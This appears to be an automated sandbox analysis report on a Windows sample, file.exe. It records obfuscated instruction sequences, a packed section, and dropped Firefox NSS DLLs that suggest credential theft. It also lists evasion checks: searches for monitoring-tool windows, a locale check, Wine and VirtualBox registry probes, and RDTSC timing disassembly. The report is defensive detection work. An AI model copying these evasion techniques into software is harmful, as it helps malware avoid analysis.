Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], ebp	0_2_00D3CE36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push ebx; mov dword ptr [esp], 0DC68C68h	0_2_00D3CE4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 12BFA89Eh; mov dword ptr [esp], ebp	0_2_00D3CE79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 53BB640Eh; mov dword ptr [esp], ecx	0_2_00D3CF78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push eax; mov dword ptr [esp], 013B69A0h	0_2_00D3CF9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3C89B push 40038F33h; mov dword ptr [esp], esi	0_2_00D3D032

Source: file.exe

Static PE information: section name: buyyxrmv entropy: 7.953408646972678

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00989860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58162

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4750F second address: D4751B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4751B second address: D4751F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46608 second address: D46612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46612 second address: D46616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46616 second address: D4664B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CE4DC41B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4664B second address: D4664F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4664F second address: D4667F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jmp 00007F8CE4DC41B1h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F8CE4DC41ADh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4667F second address: D46689 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE470D04Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46C07 second address: D46C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46C0B second address: D46C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46C11 second address: D46C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE4DC41B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46D81 second address: D46DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8CE470D04Ah 0x0000000b pop edi 0x0000000c jmp 00007F8CE470D055h 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F8CE470D046h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46DB1 second address: D46DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F8CE4DC41A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D488CE second address: D488F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xor dword ptr [esp], 43BFA121h 0x0000000e mov ecx, 4393D062h 0x00000013 lea ebx, dword ptr [ebp+1244A699h] 0x00000019 jns 00007F8CE470D047h 0x0000001f clc 0x00000020 push eax 0x00000021 je 00007F8CE470D054h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48957 second address: D489DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a clc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F8CE4DC41A8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 call 00007F8CE4DC41A9h 0x0000002c jns 00007F8CE4DC41B2h 0x00000032 push eax 0x00000033 jmp 00007F8CE4DC41B5h 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8CE4DC41AEh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D489DF second address: D48A07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007F8CE470D054h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48A07 second address: D48A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48A0B second address: D48A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D053h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48A22 second address: D48AB5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8CE4DC41ACh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov ecx, dword ptr [ebp+122D2D10h] 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F8CE4DC41A8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D331Ah], edx 0x00000034 and dx, D712h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F8CE4DC41A8h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 mov ecx, dword ptr [ebp+122D2B60h] 0x0000005b push 00000003h 0x0000005d push eax 0x0000005e mov dword ptr [ebp+122D333Eh], ecx 0x00000064 pop edi 0x00000065 push D5754DFBh 0x0000006a push eax 0x0000006b push edx 0x0000006c jl 00007F8CE4DC41ACh 0x00000072 jg 00007F8CE4DC41A6h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48AB5 second address: D48AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE470D04Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48AC3 second address: D48B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 15754DFBh 0x0000000f mov dword ptr [ebp+122D3304h], ecx 0x00000015 sub di, D817h 0x0000001a lea ebx, dword ptr [ebp+1244A6A2h] 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F8CE4DC41A8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a or ecx, 31635F76h 0x00000040 xchg eax, ebx 0x00000041 jnp 00007F8CE4DC41BDh 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48B31 second address: D48B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48B38 second address: D48B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48B3E second address: D48B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48B98 second address: D48BAF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CE4DC41ACh 0x00000008 jo 00007F8CE4DC41A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48BAF second address: D48BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48BB3 second address: D48BBD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CE4DC41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48CB6 second address: D48CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D678A8 second address: D678BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CE4DC41ACh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67A40 second address: D67A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67A4D second address: D67A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67A51 second address: D67A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67A69 second address: D67A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67C16 second address: D67C37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F8CE470D04Eh 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8CE470D04Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67C37 second address: D67C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68050 second address: D68054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6818C second address: D68192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68192 second address: D681AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CE470D04Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D681AA second address: D681C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE4DC41A6h 0x00000008 jne 00007F8CE4DC41A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F8CE4DC41A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D681C2 second address: D681CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6850D second address: D68513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68513 second address: D68517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D69423 second address: D6942F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8CE4DC41A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6942F second address: D69447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D053h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F1B3 second address: D6F1B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F692 second address: D6F698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F82F second address: D6F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F834 second address: D6F848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE470D050h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E6F9 second address: D6E700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E700 second address: D6E70A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CE470D04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D72DA8 second address: D72DB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41AAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D72DB7 second address: D72DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38C99 second address: D38CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CA7 second address: D38CB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8CE470D046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CB1 second address: D38CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CBF second address: D38CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CCB second address: D38CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CE4DC41B7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CE7 second address: D38CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CED second address: D38CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38CF3 second address: D38D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F8CE470D046h 0x00000010 jo 00007F8CE470D046h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D762D7 second address: D762EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE4DC41A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76476 second address: D76492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8CE470D054h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D767BD second address: D767C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D767C2 second address: D767EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F8CE470D04Ch 0x0000000b ja 00007F8CE470D046h 0x00000011 popad 0x00000012 jp 00007F8CE470D048h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F8CE470D048h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76956 second address: D7695B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7695B second address: D76961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76961 second address: D76987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d js 00007F8CE4DC41B2h 0x00000013 jns 00007F8CE4DC41A6h 0x00000019 jl 00007F8CE4DC41A6h 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76987 second address: D7698D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76ACF second address: D76ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 ja 00007F8CE4DC41A6h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7970E second address: D79712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79712 second address: D79723 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F8CE4DC41A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79AF1 second address: D79B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F8CE470D04Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79B00 second address: D79B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CE4DC41B2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79B1A second address: D79B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79B20 second address: D79B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D79C01 second address: D79C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
